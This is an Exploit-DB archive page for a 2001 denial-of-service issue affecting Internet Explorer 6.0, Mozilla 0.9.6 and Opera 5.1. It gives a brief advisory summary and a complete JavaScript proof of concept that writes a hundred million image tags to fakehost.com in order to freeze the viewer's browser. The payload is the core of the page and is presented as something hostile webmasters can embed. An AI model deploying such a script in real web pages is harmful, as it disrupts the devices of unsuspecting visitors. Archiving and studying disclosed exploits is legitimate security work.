Lucene search

K
exploitdbPavel TitovEDB-ID:21181
HistoryDec 11, 2001 - 12:00 a.m.

Microsoft Internet Explorer 6.0 / Mozilla 0.9.6 / Opera 5.1 - Image Count Denial of Service

2001-12-1100:00:00
Pavel Titov
www.exploit-db.com
23

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/3684/info

An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered.

An unusually high image count may cause a denial of services to users who view the webpage containing the offending image.

Malicious webmasters may construct webpages which exploit this vulnerability. 

<script>
for(i=0;i<100000000;i++) {
document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script> 

AI Score

7.4

Confidence

Low

Related for EDB-ID:21181